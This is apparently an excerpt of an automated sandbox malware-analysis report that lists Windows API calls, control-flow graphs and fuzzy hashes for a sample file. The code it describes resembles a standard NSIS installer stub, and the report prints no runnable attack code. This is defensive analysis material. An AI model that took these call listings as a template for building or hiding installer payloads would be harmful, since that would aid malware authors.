                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040510A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040512B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405038
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040517C
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405191
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004051B4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004051BB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405201
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405246
                                                                                                                                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000000FF), ref: 0040527B
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004052E0
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004052E6
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004052F9
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405326
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405331
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405337
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 590372296-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 289 4039ac-4039be 290 4039c4-4039ca 289->290 291 403aff-403b0e 289->291 290->291 292 4039d0-4039d9 290->292 293 403b10-403b58 GetDlgItem * 2 call 403e7f SetClassLongA call 40140b 291->293 294 403b5d-403b72 291->294 295 4039db-4039e8 SetWindowPos 292->295 296 4039ee-4039f1 292->296 293->294 298 403bb2-403bb7 call 403ecb 294->298 299 403b74-403b77 294->299 295->296 301 4039f3-403a05 ShowWindow 296->301 302 403a0b-403a11 296->302 307 403bbc-403bd7 298->307 304 403b79-403b84 call 401389 299->304 305 403baa-403bac 299->305 301->302 308 403a13-403a28 DestroyWindow 302->308 309 403a2d-403a30 302->309 304->305 326 403b86-403ba5 SendMessageA 304->326 305->298 306 403e4c 305->306 314 403e4e-403e55 306->314 312 403be0-403be6 307->312 313 403bd9-403bdb call 40140b 307->313 315 403e29-403e2f 308->315 317 403a32-403a3e SetWindowLongA 309->317 318 403a43-403a49 309->318 322 403e0a-403e23 DestroyWindow EndDialog 312->322 323 403bec-403bf7 312->323 313->312 315->306 320 403e31-403e37 315->320 317->314 324 403aec-403afa call 403ee6 318->324 325 403a4f-403a60 GetDlgItem 318->325 320->306 328 403e39-403e42 ShowWindow 320->328 322->315 323->322 329 403bfd-403c4a call 405bb3 call 403e7f * 3 GetDlgItem 323->329 324->314 330 403a62-403a79 SendMessageA IsWindowEnabled 325->330 331 403a7f-403a82 325->331 326->314 328->306 359 403c54-403c90 ShowWindow EnableWindow call 403ea1 EnableWindow 329->359 360 403c4c-403c51 329->360 330->306 330->331 334 403a84-403a85 331->334 335 403a87-403a8a 331->335 336 403ab5-403aba call 403e58 334->336 337 403a98-403a9d 335->337 338 403a8c-403a92 335->338 336->324 340 403ad3-403ae6 SendMessageA 337->340 342 403a9f-403aa5 337->342 338->340 341 403a94-403a96 338->341 340->324 341->336 345 
403aa7-403aad call 40140b 342->345 346 403abc-403ac5 call 40140b 342->346 355 403ab3 345->355 346->324 356 403ac7-403ad1 346->356 355->336 356->355 363 403c92-403c93 359->363 364 403c95 359->364 360->359 365 403c97-403cc5 GetSystemMenu EnableMenuItem SendMessageA 363->365 364->365 366 403cc7-403cd8 SendMessageA 365->366 367 403cda 365->367 368 403ce0-403d19 call 403eb4 call 405b91 lstrlenA call 405bb3 SetWindowTextA call 401389 366->368 367->368 368->307 377 403d1f-403d21 368->377 377->307 378 403d27-403d2b 377->378 379 403d4a-403d5e DestroyWindow 378->379 380 403d2d-403d33 378->380 379->315 382 403d64-403d91 CreateDialogParamA 379->382 380->306 381 403d39-403d3f 380->381 381->307 383 403d45 381->383 382->315 384 403d97-403dee call 403e7f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 382->384 383->306 384->306 389 403df0-403e08 ShowWindow call 403ecb 384->389 389->315
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403A05
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403A19
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403A56
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A71
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403B1F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403B29
                                                                                                                                                                                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
                                                                                                                                                                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403C3A
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403C5B
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C6D
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C88
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403CA5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,?,00429820,0042DBA0), ref: 00403CF9
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,00429820), ref: 00403D08
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E3C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 184305955-0
                                                                                                                                                                                                                                                                • Opcode ID: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
                                                                                                                                                                                                                                                                • Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 392 40361a-403632 call 405ebc 395 403634-403644 call 405aef 392->395 396 403646-403677 call 405a78 392->396 404 40369a-4036c3 call 4038df call 40570f 395->404 401 403679-40368a call 405a78 396->401 402 40368f-403695 lstrcatA 396->402 401->402 402->404 410 4036c9-4036ce 404->410 411 40374a-403752 call 40570f 404->411 410->411 412 4036d0-4036f4 call 405a78 410->412 417 403760-403785 LoadImageA 411->417 418 403754-40375b call 405bb3 411->418 412->411 419 4036f6-4036f8 412->419 421 403806-40380e call 40140b 417->421 422 403787-4037b7 RegisterClassA 417->422 418->417 426 403709-403715 lstrlenA 419->426 427 4036fa-403707 call 40564c 419->427 434 403810-403813 421->434 435 403818-403823 call 4038df 421->435 423 4038d5 422->423 424 4037bd-403801 SystemParametersInfoA CreateWindowExA 422->424 431 4038d7-4038de 423->431 424->421 428 403717-403725 lstrcmpiA 426->428 429 40373d-403745 call 405621 call 405b91 426->429 427->426 428->429 433 403727-403731 GetFileAttributesA 428->433 429->411 438 403733-403735 433->438 439 403737-403738 call 405668 433->439 434->431 445 403829-403846 ShowWindow LoadLibraryA 435->445 446 4038ac-4038b4 call 404f4e 435->446 438->429 438->439 439->429 448 403848-40384d LoadLibraryA 445->448 449 40384f-403861 GetClassInfoA 445->449 453 4038b6-4038bc 446->453 454 4038ce-4038d0 call 40140b 446->454 448->449 451 403863-403873 GetClassInfoA RegisterClassA 449->451 452 403879-4038aa DialogBoxParamA call 40140b call 40356a 449->452 451->452 452->431 453->434 456 4038c2-4038c9 call 40140b 453->456 454->423 456->434
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400,756A3410,00434000,00000000), ref: 00403695
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042D340,?,?,?,0042D340,00000000,00434400,00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400), ref: 0040370A
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0042D340), ref: 00403728
                                                                                                                                                                                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 00403771
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 004037AE
                                                                                                                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
                                                                                                                                                                                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403831
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 00403873
                                                                                                                                                                                                                                                                • DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 914957316-2904746566
                                                                                                                                                                                                                                                                • Opcode ID: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
                                                                                                                                                                                                                                                                • Instruction ID: d178aa451f166566eaf2c3163fe56623853c288c4747cf6087cde58c0eecb14b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2961B4B1B442406ED620AF629C45F273EACE745749F40457EF904B72E1C77DAD02CA2D

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 463 403fc8-403fd8 464 4040ea-4040fd 463->464 465 403fde-403fe6 463->465 468 404159-40415d 464->468 469 4040ff-404108 464->469 466 403fe8-403ff7 465->466 467 403ff9-404091 call 403e7f * 2 CheckDlgButton call 403ea1 GetDlgItem call 403eb4 SendMessageA 465->467 466->467 501 404093-404096 GetSysColor 467->501 502 40409c-4040e5 SendMessageA * 2 lstrlenA SendMessageA * 2 467->502 471 404163-404177 GetDlgItem 468->471 472 40422d-404234 468->472 473 40423c 469->473 474 40410e-404116 469->474 479 404179-404180 471->479 480 4041eb-4041f2 471->480 472->473 476 404236 472->476 478 40423f-404246 call 403ee6 473->478 474->473 475 40411c-404128 474->475 475->473 481 40412e-404154 GetDlgItem SendMessageA call 403ea1 call 404252 475->481 476->473 488 40424b-40424f 478->488 479->480 484 404182-40419d 479->484 480->478 485 4041f4-4041fb 480->485 481->468 484->480 489 40419f-4041e8 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 484->489 485->478 490 4041fd-404201 485->490 489->480 493 404203-404212 SendMessageA 490->493 494 404214-404218 490->494 493->494 497 404228-40422b 494->497 498 40421a-404226 SendMessageA 494->498 497->488 498->497 501->502 502->488
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404067
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404096
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004040B7
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040413D
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00404140
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040416B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041C3
                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                                                                • String ID: N$open
                                                                                                                                                                                                                                                                • API String ID: 3615053054-904208323
                                                                                                                                                                                                                                                                • Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00405941
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405A32
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A39
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 1265525490-4148678300
                                                                                                                                                                                                                                                                • Opcode ID: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
                                                                                                                                                                                                                                                                • Instruction ID: a7ae131883122c305ebb5a94e4791e7dc74bc152dd9dfe90db1d6281d1838ee4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE41EF71A05A55AFD3206B215C89F6B3A5CEB45758F14053ABE02B22D2DA7CAC018EBD

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                                                • DrawTextA.USER32(00000000,0042DBA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040430C
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,?), ref: 00404336
                                                                                                                                                                                                                                                                • SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004043F2
